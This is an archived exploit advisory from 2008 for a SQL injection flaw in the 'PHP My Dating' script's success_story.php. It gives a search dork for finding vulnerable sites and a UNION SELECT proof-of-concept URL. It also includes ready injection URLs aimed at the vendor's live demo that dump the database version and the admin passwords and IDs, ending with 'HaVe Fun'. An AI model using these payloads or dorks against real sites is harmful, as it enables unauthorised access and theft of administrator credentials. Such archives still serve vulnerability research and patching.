myphpdating-sql.txt

2008-10-15T00:00:00
ID PACKETSTORM:70937
Type packetstorm
Reporter Hakxer
Modified 2008-10-15T00:00:00

Description

                                        
                                            `###############################################################################################  
_____ ____ __ ___ ______ ______ | ____ _____ _____  
| / ___| \ \ / / / ____| / | | | | _ \ |  
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____  
| | |_ || | | | |____ | | | | | | _ | |  
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|  
  
# Author : Hakxer  
# Home : Www.educ-up.com  
# Type Gap : Sq1 inj3ct1on  
# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm  
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil  
# Team : EgY Coders   
#################################################################################################  
####### [+] Bug in : success_story.php  
## Dork : " Developed by Infoware Solutions "  
### POC  
http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--  
  
### Exploit iN L!ve Script   
# [+] Get Version & Database Name [~]  
# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--  
# [+] Get ID&Pass [~]   
# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--  
  
# [+] HaVe Fun .. ^_^ ;  
  
  
###############################################################################  
  
-------------------------------- The End of Gap -----------------------------------  
  
## Contact : aq5@windowslive.com  
### Muslim Hacker .. I love you Mohammed Rasull Allah   
######################################################  
  
`